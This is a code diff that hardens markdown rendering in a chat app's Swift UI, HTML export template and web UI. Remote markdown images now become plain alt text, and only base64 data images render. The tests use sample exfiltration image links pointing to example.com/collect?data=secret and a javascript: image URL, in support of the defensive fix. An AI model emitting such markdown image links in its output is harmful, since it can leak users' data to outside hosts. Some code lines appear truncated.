diff --git a/apps/shared/OpenClawKit/Sources/OpenClawChatUI/ChatMarkdownPreprocessor.swift b/apps/shared/OpenClawKit/Sources/OpenClawChatUI/ChatMarkdownPreprocessor.swift index 0b012586672..746721e9d99 100644 --- a/apps/shared/OpenClawKit/Sources/OpenClawChatUI/ChatMarkdownPreprocessor.swift +++ b/apps/shared/OpenClawKit/Sources/OpenClawChatUI/ChatMarkdownPreprocessor.swift @@ -13,6 +13,8 @@ enum ChatMarkdownPreprocessor { "Chat history since last reply (untrusted, for context):", ] + private static let markdownImagePattern = #"!\[([^\]]*)\]\(([^)]+)\)"# + struct InlineImage: Identifiable { let id = UUID() let label: String @@ -27,8 +29,7 @@ enum ChatMarkdownPreprocessor { static func preprocess(markdown raw: String) -> Result { let withoutContextBlocks = self.stripInboundContextBlocks(raw) let withoutTimestamps = self.stripPrefixedTimestamps(withoutContextBlocks) - let pattern = #"!\[([^\]]*)\]\((data:image\/[^;]+;base64,[^)]+)\)"# - guard let re = try? NSRegularExpression(pattern: pattern) else { + guard let re = try? NSRegularExpression(pattern: self.markdownImagePattern) else { return Result(cleaned: self.normalize(withoutTimestamps), images: []) } @@ -44,24 +45,41 @@ enum ChatMarkdownPreprocessor { for match in matches.reversed() { guard match.numberOfRanges >= 3 else { continue } let label = ns.substring(with: match.range(at: 1)) - let dataURL = ns.substring(with: match.range(at: 2)) - - let image: OpenClawPlatformImage? = { - guard let comma = dataURL.firstIndex(of: ",") else { return nil } - let b64 = String(dataURL[dataURL.index(after: comma)...]) - guard let data = Data(base64Encoded: b64) else { return nil } - return OpenClawPlatformImage(data: data) - }() - images.append(InlineImage(label: label, image: image)) + let source = ns.substring(with: match.range(at: 2)) let start = cleaned.index(cleaned.startIndex, offsetBy: match.range.location) let end = cleaned.index(start, offsetBy: match.range.length) - cleaned.replaceSubrange(start.. InlineImage? { + let trimmed = source.trimmingCharacters(in: .whitespacesAndNewlines) + guard let comma = trimmed.firstIndex(of: ","), + trimmed[.. String { + let trimmed = label.trimmingCharacters(in: .whitespacesAndNewlines) + return trimmed.isEmpty ? "image" : trimmed + } + private static func stripInboundContextBlocks(_ raw: String) -> String { guard self.inboundContextHeaders.contains(where: raw.contains) else { return raw diff --git a/apps/shared/OpenClawKit/Tests/OpenClawKitTests/ChatMarkdownPreprocessorTests.swift b/apps/shared/OpenClawKit/Tests/OpenClawKitTests/ChatMarkdownPreprocessorTests.swift index 781a325f3cf..66b9d49fa8e 100644 --- a/apps/shared/OpenClawKit/Tests/OpenClawKitTests/ChatMarkdownPreprocessorTests.swift +++ b/apps/shared/OpenClawKit/Tests/OpenClawKitTests/ChatMarkdownPreprocessorTests.swift @@ -18,6 +18,30 @@ struct ChatMarkdownPreprocessorTests { #expect(result.images.first?.image != nil) } + @Test func flattensRemoteMarkdownImagesIntoText() { + let base64 = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQIHWP4////GQAJ+wP/2hN8NwAAAABJRU5ErkJggg==" + let markdown = """ + ![Leak](https://example.com/collect?x=1) + + ![Pixel](data:image/png;base64,\(base64)) + """ + + let result = ChatMarkdownPreprocessor.preprocess(markdown: markdown) + + #expect(result.cleaned == "Leak") + #expect(result.images.count == 1) + #expect(result.images.first?.image != nil) + } + + @Test func usesFallbackTextForUnlabeledRemoteMarkdownImages() { + let markdown = "![](https://example.com/image.png)" + + let result = ChatMarkdownPreprocessor.preprocess(markdown: markdown) + + #expect(result.cleaned == "image") + #expect(result.images.isEmpty) + } + @Test func stripsInboundUntrustedContextBlocks() { let markdown = """ Conversation info (untrusted metadata): diff --git a/src/auto-reply/reply/export-html/template.js b/src/auto-reply/reply/export-html/template.js index 565eeda7f65..521a183ea3c 100644 --- a/src/auto-reply/reply/export-html/template.js +++ b/src/auto-reply/reply/export-html/template.js @@ -1712,6 +1712,22 @@ return text.replace(/<(?=[a-zA-Z/])/g, "<"); } + const INLINE_DATA_IMAGE_RE = /^data:image\/[a-z0-9.+-]+;base64,/i; + + function normalizeMarkdownImageLabel(text) { + const trimmed = typeof text === "string" ? text.trim() : ""; + return trimmed || "image"; + } + + function renderMarkdownImage(token) { + const label = normalizeMarkdownImageLabel(token?.text); + const href = typeof token?.href === "string" ? token.href.trim() : ""; + if (!INLINE_DATA_IMAGE_RE.test(href)) { + return escapeHtml(label); + } + return `${escapeHtml(label)}`; + } + // Configure marked with syntax highlighting and HTML escaping for text marked.use({ breaks: true, @@ -1750,6 +1766,9 @@ html(token) { return escapeHtml(token.text); }, + image(token) { + return renderMarkdownImage(token); + }, }, }); diff --git a/src/auto-reply/reply/export-html/template.security.test.ts b/src/auto-reply/reply/export-html/template.security.test.ts index 2837df7036b..aedf98c5986 100644 --- a/src/auto-reply/reply/export-html/template.security.test.ts +++ b/src/auto-reply/reply/export-html/template.security.test.ts @@ -250,4 +250,38 @@ describe("export html security hardening", () => { expect(img?.getAttribute("onerror")).toBeNull(); expect(img?.getAttribute("src")).toBe("data:application/octet-stream;base64,AAAA"); }); + + it("flattens remote markdown images but keeps data-image markdown", () => { + const dataImage = "data:image/png;base64,AAAA"; + const session: SessionData = { + header: { id: "session-4", timestamp: now() }, + entries: [ + { + id: "1", + parentId: null, + timestamp: now(), + type: "message", + message: { + role: "assistant", + content: [ + { + type: "text", + text: `Leak:\n\n![exfil](https://example.com/collect?data=secret)\n\n![pixel](${dataImage})`, + }, + ], + }, + }, + ], + leafId: "1", + systemPrompt: "", + tools: [], + }; + + const { document } = renderTemplate(session); + const messages = document.getElementById("messages"); + expect(messages).toBeTruthy(); + expect(messages?.querySelector('img[src^="https://"]')).toBeNull(); + expect(messages?.textContent).toContain("exfil"); + expect(messages?.querySelector(`img[src="${dataImage}"]`)).toBeTruthy(); + }); }); diff --git a/ui/src/ui/markdown.test.ts b/ui/src/ui/markdown.test.ts index e355ff922a4..279cb2b53fb 100644 --- a/ui/src/ui/markdown.test.ts +++ b/ui/src/ui/markdown.test.ts @@ -30,11 +30,10 @@ describe("toSanitizedMarkdownHtml", () => { expect(html).toContain("console.log(1)"); }); - it("preserves img tags with src and alt from markdown images (#15437)", () => { + it("flattens remote markdown images into alt text", () => { const html = toSanitizedMarkdownHtml("![Alt text](https://example.com/image.png)"); - expect(html).toContain(" { @@ -43,11 +42,17 @@ describe("toSanitizedMarkdownHtml", () => { expect(html).toContain("data:image/png;base64,"); }); - it("strips javascript image urls", () => { + it("flattens non-data markdown image urls", () => { const html = toSanitizedMarkdownHtml("![X](javascript:alert(1))"); - expect(html).toContain(" { + const html = toSanitizedMarkdownHtml("![](https://example.com/image.png)"); + expect(html).not.toContain(" { diff --git a/ui/src/ui/markdown.ts b/ui/src/ui/markdown.ts index 354d4765265..f98ef017351 100644 --- a/ui/src/ui/markdown.ts +++ b/ui/src/ui/markdown.ts @@ -43,6 +43,7 @@ const MARKDOWN_CHAR_LIMIT = 140_000; const MARKDOWN_PARSE_LIMIT = 40_000; const MARKDOWN_CACHE_LIMIT = 200; const MARKDOWN_CACHE_MAX_CHARS = 50_000; +const INLINE_DATA_IMAGE_RE = /^data:image\/[a-z0-9.+-]+;base64,/i; const markdownCache = new Map(); function getCachedMarkdown(key: string): string | null { @@ -137,6 +138,19 @@ export function toSanitizedMarkdownHtml(markdown: string): string { // pages) as formatted output is confusing UX (#13937). const htmlEscapeRenderer = new marked.Renderer(); htmlEscapeRenderer.html = ({ text }: { text: string }) => escapeHtml(text); +htmlEscapeRenderer.image = (token: { href?: string | null; text?: string | null }) => { + const label = normalizeMarkdownImageLabel(token.text); + const href = token.href?.trim() ?? ""; + if (!INLINE_DATA_IMAGE_RE.test(href)) { + return escapeHtml(label); + } + return `${escapeHtml(label)}`; +}; + +function normalizeMarkdownImageLabel(text?: string | null): string { + const trimmed = text?.trim(); + return trimmed ? trimmed : "image"; +} function escapeHtml(value: string): string { return value